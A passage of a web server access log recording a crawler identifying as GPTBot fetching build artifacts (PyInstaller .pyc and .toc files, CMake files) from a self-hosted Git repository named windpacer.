"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:15:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9938] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:15:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:15:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:01:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:01:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10023] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:01:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:01:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10023] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:01:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" +[17/Feb/2026:15:01:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9937] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:01:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 24017] [Gzip 15.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:01:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11072] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" +[17/Feb/2026:15:01:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:01:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9928] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" +[17/Feb/2026:15:01:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:01:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:01:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:01:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20384] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:01:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:01:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20387] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:01:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:01:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14304] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:01:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:01:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:01:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14306] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:01:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:01:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:01:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:15:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs" [Client 74.7.227.38] [Length 9899] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:15:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 9877] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:15:01:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:15:01:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 80799] [Gzip 29.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:15:01:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 130628] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:15:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 23475] [Gzip 11.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" +[17/Feb/2026:15:01:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:01:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10936] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build" +[17/Feb/2026:15:01:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:15:01:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 14229700] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz" +[17/Feb/2026:15:01:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21618] [Gzip 15.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:01:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10221] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:01:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:01:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10936] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build" +[17/Feb/2026:15:01:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 59754] [Gzip 16.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" +[17/Feb/2026:15:01:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:15:01:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 33418] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:15:01:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 9881] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:15:01:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51201] [Gzip 26.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:01:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr 